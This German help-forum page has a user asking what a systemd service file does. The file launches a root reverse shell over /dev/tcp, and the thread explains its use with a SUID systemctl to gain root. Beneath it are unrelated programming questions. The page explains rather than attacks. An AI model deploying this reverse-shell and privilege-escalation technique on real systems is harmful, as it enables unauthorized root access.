was macht dieser code?

Was macht folgender code:

Bitte zeile für zeile erklären

[Unit]

Description=root

[Service]

Type=simple

User=root

ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/127.0.0.1/4242 0>&1'

[Install]

WantedBy=multi-user.target

1 Antwort

PhotonX

Von gutefrage auf Grund seines Wissens auf einem Fachgebiet ausgezeichneter Nutzer

Computer

27.03.2022, 18:11

Das ist eine Service-Datei, die von Systemd gestartet wird.

[Unit]

Description=root

Das ist die Beschreibung des Services (hier einfach "root").

[Service]
Type=simple
User=root
ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/127.0.0.1/4242 0>&1'

Hier wird festgelegt, dass der Typ des Services "simple", also einfach ist, das Service vom Benutzer "root", also dem Administrator, ausgeführt wird. Der ausgeführte Befehl ist dabei das Öffnen einer interaktiven Bash-Shell, alle entstehenden Ausgaben werden via TCP an den Port 4242 gesendet.

[Install]
WantedBy=multi-user.target

Das Service wird an einer bestimmten Stelle (einem sog. Target) des Boot-Vorgangs gestartet.

verreisterNutzer

28.03.2022, 09:42

danke erstmal, aber Ich verstehe nicht ganz wie dieser simple code mich als root user einloggt. der code wurde auf einem linux system verwendet und nutzt dabei die SUID von der systemctl um halt diese shell als root zu generieren.

ausgeführt wurde der code auf dem system mit "systemctl enable /tmp/root.service" und "systemctl start root", von einem user ohne root privileges

könntest du vielleicht nochmal diese beiden befehle erklären und erklären warum mir genau "systemctl" diese rechte ermöglicht und nicht jede andere SUID datei auch?

verreisterNutzer

28.03.2022, 09:47

@verreisterNutzer

Man hatte nach ausführen des codes nämlich zugriff auf das ganze linux system als root user und das verwirrt mich

Ähnliche Fragen

grub-install: funktioniert nicht?

Hallo, ich habe bis eben Arch Linux installiert. Jedoch kam ich an einer Stelle immer nicht mehr weiter. Hier ein kleiner Log, was ich zuletzt eingegeben hatte:

[root@archiso /]# grub install /dev/sda

Installing for x86_64-efi platform.

grub-install: error: cannot find EFI directory.

[root@archiso /]#

...zur Frage

discord.py, nur bestimmte user id's einen command ausführen lassen?

Hallo, ich suche eine Möglichkeit, dass nur bestimmte User mit einer bestimmten UserID einen bestimmten Befehl ausführen können (Code unten).

Dieser Command soll nur von bestimmten IDs ausgeführt werden:
(Programmiersprache Python, discord.py)

@help.command()
  async def dev(ctx):
    em = discord.Embed(title="**Dev Commands**", colour=discord.Colour.blurple(),
                       description=""
                                   "test")
    await ctx.send(embed=em)

...zur Frage

MySql, PhP Login/Register seite fehler: Warning: mysqli_connect(): (HY000/2002): No such file or directory?

Guten Abend.

Ich habe folgendes Problem ich bekomme im Internet immer diese Fehlermeldung angezeigt: Warning: mysqli_connect(): (HY000/2002): No such file or directory in /X/X/X/X/X/config.php on line 10 (x ist natürlich der Pfad).

Hier mein Source Code:

<?php
/* Database credentials. Assuming you are running MySQL
server with default setting (user 'root' with no password) / define('DB_SERVER', '127.0.0.1'); define('DB_USERNAME', 'XXX'); define('DB_PASSWORD', 'XXX'); define('DB_NAME', 'users');   / Attempt to connect to MySQL database */
$conn = mysqli_connect($DBHOST, $DBUSER, $DBPASS, $DBNAME);
 
// Check connection
if($link === false){
    die("ERROR: Could not connect. " . mysqli_connect_error());
}
?>

Im Internet habe ich jetzt 60 min verbracht um diesen Fehler zu behebn, finde aber keine Lösung die hilft.

Danke

...zur Frage

Linux: You need to load kernel first. Wie kann ich booten ohne diese Meldung?

PS: mit dem Code Startet Linux doch ich muss den jedes mal aufs Neue eingeben.

insmod linux linux /vmlinuz root=/dev/sda2 initrd /initrd.img boot

...zur Frage

Python 3 pip wird nicht erkannt?

Hi,

habe schon länger das Problem, dass ich in der Konsole bzw. in VS-Code kein pip o.Ä. zum laufen bekomme. Pip ist installiert wenn ich "py -m ensurepip --upgrade" eingebe wird mir angezeigt: "Requirement already satisfied". Wenn ich nun pip nutzen will z.B. "py pip install discord" bekomme ich das: "C:\Users\username\AppData\Local\Programs\Python\Python310\python.exe: can't open file 'C:\\Users\\username\\Documents\\#Shared\\dev\\pip': [Errno 2] No such file or directory". Habe bereits scripts und side packages zu path Tabele hinzugefügt! In PyCharm funktioniert alles einwandfrei würde aber gerne VS-Code benutzen. Irgendwelche Vorschläge was ich jetzt noch machen kann?

...zur Frage

Raspberry Pi - sh.-Script mit PHP ausführen - sudo/root-Rechte?

Hallo ich habe ein kleines bash-script , dass sieht so aus:

#!/bin/bash
sudo hdparm -y /dev/sda1

Der Dateiname lautet : script.sh

Ich habe einen Webserver mit Apache2 und Php5

Nun möchte ich die bash-Datei mit PHP ausführen. Allerdings funktioniert das nicht. Ich habe seeeehr viel gegoogelt und immer wurde gesagt es liegt an den Rechten, aber nie funktioniert es. Ich verzweifle echt dolle im Moment.

Kann mir bitte einer erklären wie ich das hinbekomme?

Ps. Die PHP Datei heißt index.php und liegt bei /var/ww

pps. Es geht mir nicht darum, dass es sicher ist! Da alles eh nur local läuft :D

lg. findo

...zur Frage

Docker Fehlermeldung?

Nabend,

ich möchte sozusagen als Client auf einen Containerzugreifen der dann als Server fungieren soll. Den Container hab ich so erstellt:

docker run -e MYSQL_ROOT_PASSWORD=rootpw -d --name mysqlserver1 --publish 3306:3306 mysql

Der Port 3306 wurde auf den Port 3306 gemappt. Das Image hat den Namen mysql erhalten. Das Mapping funktioniert auch. Dies habe ich mit

Docker ps

überprüft.

Ich will mich sozusagen als Client auf den Servercontainer einloggen. Das mache ich folgendermaßen:

PS C:\> mysql -h 127.0.0.1 -P 3306 -u root -p

Führe ich das aus, bekomme ich folgende Fehlermeldung:

mysql : Die Benennung "mysql" wurde nicht als Name eines Cmdlet, einer Funktion, einer Skriptdatei oder eines ausführbaren Programms erkannt.
Überprüfen Sie die Schreibweise des Namens, oder ob der Pfad korrekt ist (sofern enthalten), und wiederholen Sie den Vorgang.
In Zeile:1 Zeichen:1

Offenbar stört er sich an dem Imagenamen. Gebe ich die Container ID an oder den Namen, funktioniert ebenfalls nicht.

Ich habe natürlich gegoogelt, aber es stellte sich als Unwahrheit heraus :)

Danke im Voraus

...zur Frage

Bash Error: Dateiende beim Suchen nach ` " ' erreicht. Was tun?

Hey,

Ich arbeite momentan an einem Datei Manager für die Shell. Jetzt habe ich folgende Fehlermeldungen:

Datei_Manager.sh: Zeile 180: Dateiende beim Suchen nach ` " ' erreicht

Datei_Manager.sh: Zeile 183: Syntax Fehler: Unerwartetes Dateiende

Meinen ganzer Code ist zu lang um den hier jetzt einzufügen. Ich wollt einfach nur mal wissen, was die möglichen Fehler sind die ich gemacht haben könnte weshalb die beiden Fehlermeldungen erscheinen, damit ich gezielter suchen kann.

Also:

Welche möglichen Fehler könnte ich gemacht haben?

Danke schon im vorraus für (schnelle) Antworten!

Bastian

...zur Frage

Wie vererbt man PHP Bedingungen beim paginieren einer Tabelle an die folgenden Seiten?

Hallo,

eigentlich habe ich 2 Fragen zu PHP, aber das hätte nicht alles ich die Überschrift gepasst.

Frage 1

Ich erlerne gerade PHP und MySQL. Dafür habe ich in einer Datenbank eine Tabelle über Internet Radiostationen angelegt, mit Sendername, Land, Kontinent, StreamURL, Genre usw. Über ein Auswahlmenü lässt sich die Tabelle nach Sendernamen, Land oder Kontinent sortieren. Das klappt soweit auch. Damit aber nicht mehr als 20 Radiostationen auf einer Seite erscheinen, habe ich unter Zuhilfenahme eines Buches die Seiten paginiert (Steige da aber noch nicht so richtig durch). Wenn ich nun die Radiostationen nach Land oder Kontinent sortiere, dann klappt das zwar auf der ersten Seite aber auf der zweiten Seite ist wieder alles nach den Sendernamen sortiert.

Was muss ich machen, damit die Sortier – Auswahl auch an die folgenden Seiten übergeben wird?

Hier ist der PHP Code

<?php

$sortieren = $_POST['sortieren'];

if($sortieren == "Sendername") {

$ergebnis = $mysqli -> query("SELECT * FROM sender ORDER BY sendername LIMIT $start, $anzahl_pro_seite");

} elseif($sortieren == "Kontinent") {

$ergebnis = $mysqli -> query("SELECT * FROM sender ORDER BY kontinent LIMIT $start, $anzahl_pro_seite");

} elseif($sortieren == "Land") {

$ergebnis = $mysqli -> query("SELECT * FROM sender ORDER BY land LIMIT $start, $anzahl_pro_seite");

}

Frage 2

Wie muss die Fall – Entscheidung formuliert werden?

Natürlich soll man Radiosender über ein Eingabeformular finden können. Auch das funktioniert. Allerdings möchte ich, wenn es keinen Sender mit dem entsprechenden Namen gibt, das ein Text wie z. B. "Leider kein Sender mit diesem Namen zu finden" erscheint. Dafür habe ich in der Fall – Entscheidung folgende 2 Dinge ausprobiert:

if($zeile == !array()) {

echo "Leider gab es keinen Sender mit dem Namen";

}

Das klappt nicht.

if($zeile == false) {

echo "Leider gab es keinen Sender mit dem Namen";

}

Das klappt auch nicht.

if($zeile == null) {

echo "Leider gab es keinen Sender mit dem Namen";

}

War auch 'ne Nullnummer :)

Hier ist der komplette Code dazu:

<body>

<label>Sendername eingeben:</label><br />

</form>

<?php

if(isset($_POST['gesendet'])) {

$suchbegriff = htmlspecialchars($_POST['suchbegriff']);

echo $suchbegriff . "<br />";

$db = mysqli_connect("localhost", "root");

mysqli_set_charset($db, "utf8");

mysqli_select_db($db, "radio2");

$sql = "SELECT * FROM sender WHERE sendername LIKE '%$suchbegriff%' ";

$erg = mysqli_query($db, $sql);

while($zeile = mysqli_fetch_assoc($erg)) {

echo $zeile['sendername'] . " ". $zeile['kontinent'] ." ". $zeile['land'] . " ". $zeile['ort'] . " ". $zeile['genre'] . " ". $zeile['streamurl'] . "<br /><br />" ;

}

if($zeile == !array()) {

echo "Leider gab es keinen Sender mit dem Namen";

}

</body>

Danke für's lesen.

...zur Frage

Mehrsprachige Webseite(n) in PHP steuern?

Ich besitze Webseiten in verschiedenen Sprachen. Von Code her sind alle gleich (kopiert), sind halt nur übersetzt. Um die Pflege des Codes einfacher zu gestalten möchte ich nun nur noch einen Code (root) benutzen und einfach mit Sprachdateien arbeiten. Bisher habe ich es so gehandhabt, dass ich per htaccess redirect PHP Datein ausgeführt habe.

RewriteRule ^apfel/([^/]*) /page.php [L]

In den kopierten Webseiten in anderen Sprachen habe ich dann einfach die Zeile geändert.

RewriteRule ^apple/([^/]*) /page.php [L]

Um den Code der Webseite einfacher zu pflegen plane ich nun nur noch eine Webseite (ein root) mit Sprachdateien. Jetzt stellt es mir die Frage, wie gehe ich mit den Redirects um?

Ich möchte ungern in eine htaccess datei sämtliche redirects in verschiedenen Sprachen schreiben. Meine plan wäre es jetzt den ganzen traffic auf eine einzige PHP Datei zu schicken und dort überprüfe ich welche domain aufgerufen wurde, lade anhand der die Sprachdatei ($lang["url"]) und überprüfe dann welchen Inhalt bsw. Sprache angezeigt werden soll.

Wie zum Beispiel bei domain.de

if($url == $lang["url"][1]) { 
// domain.de/apfel/
} else if ($url == $lang["url"][2]) { 
// domain.de/birne/
}

Oder bei domain.com

if($url == $lang["url"][1]) { 
// domain.com/apple/
} else if ($url == $lang["url"][2]) { 
// domain.com/pear/
}

Wenn ich nun den ganzen Traffic auf eine PHP Datei schicke ist das dann von der Perfomance nicht so gut da dies eine recht lange Datei werden kann? Falls es noch andere Lösungen geben sollte, höre ich diese gerne. Hoffe man versteht, welches "Problem" ich habe.

...zur Frage

PHP kann für Putty nicht installiert werden?

Immer wenn ich den installations Befehl für PHP eingebe, kommt eine Fehlermeldung! Somit kann ich kein phpmyadmin installieren. Das brauche ich für die mysql Datenbank auf meinem Root- / V-Server.

Code:

apt install php7.4 php7.4-cli php7.4-curl php7.4-gd php7.4-intl php7.4-json php7.4-mbstring php7.4-mysql php7.4-opcache php7.4-readline php7.4-xml php7.4-xsl php7.4-zip php7.4-bz2 libapache2-mod-php7.4 -y

...zur Frage

Unerwartetes Dateiende in BASH Script?

Hallo,

In meinem Bash Programm wird beim Compilen "Unerwartetes Dateiende" angezeigt.

Woran liegt das ?

CODE:

#!/bin/bash
# Functions
function pingpass(){
   dialog --msgbox "Ping Successfull ! -> Host is Online !"
   sleep 4
   dialog --clear
   logonconf
}
function pingfail(){    dialog --msgbox "Ping Failed ! -> Host is Offline !"    sleep 4    dialog --clear    dialog --msgbox "Programm Terminated because of an Error !" }
function logoncof(){    dialog --title "RDP Logon Srcipt" --yesno "Please confirm your choosen Option:\n $logon" 0 0 }

Main
logon=
dialog --title "RDP Logon Srcipt" --menu "Please choose a Server to Logon !" 0 0 0 \
&nbsp;"Linux1" "" "Linux2" "" "Linux3" "" 3&gt;&amp;1 1&gt;&amp;2 2&gt;&amp;3
 dialog --clear

if [$logon = "Linux1"]
   then
      ping -c1 192.168.2.1 > /dev/null
      if [ $? -eq 0 ]
    then 
   pingpass
    else
   pingfail
fi

...zur Frage

ARCH-Chroot: chpasswd authentication token manipulation error?

Ich habe ein Installations-Script für Arch-Linux geschrieben.

Doch wenn dieser Befehl ausgeführt wird:

arch-chroot /target bash -c "echo root:'$root_pass' | chpasswd"

Bekomme ich immer einen "authentication token manipulation error". Wie behebe ich das?

Ich chroote mich nicht in das Installations-verzeichnis rein und führe dann alle Befehle aus, sondern chroote ich mich für jeden Befehl erneut rein.

Wer möchte kann sich den ganzen Code mal unter https://github.com/Niklas20114552/arch-tui-installer/blob/main/setup angucken.

...zur Frage

Visual Studio Code erkennt pip nicht?

Hallo,

ich wollte in Python das PIL.Image-Tool einbinden.

Dafür habe ich diesen Befehl eingegeben:

pip install Pillow

Anschließend kam diese Fehlermeldung:

pip : Die Benennung "pip" wurde nicht als Name eines Cmdlet, einer Funktion, einer Skriptdatei oder eines ausführbaren Programms erkannt. Überprüfen Sie die Schreibweise des Namens, oder ob der Pfad korrekt ist (sofern enthalten), und wiederholen Sie den Vorgang.

In Zeile:1 Zeichen:1

+ pip install Pillow

+ ~~~

+ CategoryInfo : ObjectNotFound: (pip:String) [], CommandNotFoundException

+ FullyQualifiedErrorId : CommandNotFoundException

Kann mir da jemand helfen?

...zur Frage

Was möchtest Du wissen?

Deine Frage stellen